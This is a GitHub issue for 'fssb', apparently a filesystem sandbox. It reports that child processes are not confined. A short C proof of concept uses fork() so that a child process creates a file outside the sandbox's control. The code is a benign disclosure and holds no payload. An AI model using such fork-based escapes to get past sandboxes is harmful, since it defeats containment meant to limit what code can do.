fssb icon indicating copy to clipboard operation
fssb copied to clipboard

Published 20 hours ago verified publisher icon adtac

subprocess's syscalls are not limited in fssb so that escape may happen

Open Cossack9989 opened this issue 4 years ago • 0 comments 

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

int main(){
	pid_t pid;
	pid = fork();
	printf("pid: %d\n",pid);
	if(pid==0){
		puts("hello?");
		open("fuck.txt", O_CREAT, 0666);
	}
	return 0;
}

As we can see, we create an escaped file by using subprocess to operate files.

Cossack9989 avatar Mar 02 '20 03:03 Cossack9989